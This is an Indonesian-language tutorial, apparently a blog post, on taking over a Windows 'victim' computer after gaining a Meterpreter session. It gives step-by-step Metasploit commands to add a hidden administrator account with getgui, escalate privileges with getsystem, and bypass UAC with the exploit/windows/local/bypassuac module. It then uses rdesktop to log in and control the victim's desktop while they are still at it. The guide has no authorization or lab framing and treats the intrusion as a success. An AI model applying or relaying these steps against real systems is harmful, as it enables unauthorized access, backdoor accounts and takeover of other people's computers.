Mengaktifkan Full Akses Remote Dekstop setelah masuk Meterpreter

Cara menambahkan user administrator dan mengontrol dekstop korban dengan metasploit

Mengaktifkan Remote Dekstop Victim setelah masuk Meterpreter
Saya asumsikan kalian sudah mendapat sesi meterpreter dari system target
Untuk tutorial seputar metasploit bisa baca disini

Gunakan getgui untuk membuat account baru agar bisa melakukan remote dekstop connection

run getgui -u usernamebaru -p passwordnya

Jika muncul pesan Insufficient privileges, itu menunjukkan bahwa kita tidak diperbolehkan untuk menjalankan perintah tersebut. Jadi kita harus terlebih dahulu mendapatkankan hak administrator dalam sistem tersebut.

Untuk mendapatkan hak administrator bisa gunakan perintah

getsystem

Apabila muncul pesan seperti berikut

[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

Itu karena UAC (User Account Control System) target sedang aktif. Namun jangan khawatir, metasploit memiliki module exploit untuk melakukan bypass UAC.

background

Lalu gunakan module exploit exploit/windows/local/bypassuac

use exploit/windows/local/bypassuac
show options
set session 1 (sessions yang sebelumnya di dapatkan)

Lalu kembali jalankan exploitnya

exploit

Seharusnya setelah melakukan bypass UAC kalian sudah mendapatkan hak administrator system

getsystem

Coba jalankan getgui kembali untuk membuat account Remote Desktop Cennection

run getgui -u usernamebaru -p passwordnya

Account RDP dengan full administrator berhasil dibuat :). Lanjut ke langkah berikutnya

Untuk melakukan remote dekstop bisa gunakan perintah

rdesktop -u username -p password IP iptarget

kwwk ternyata komputer masih digunakan sama si korban :v, pilih yes untuk lock off.

Tunggu beberapa saat

Sukses bro :D. Sudah berhasil login, sekarang kita dapat mengoperasikan komputer korban dengan mouse dan keyboard kita sendiri.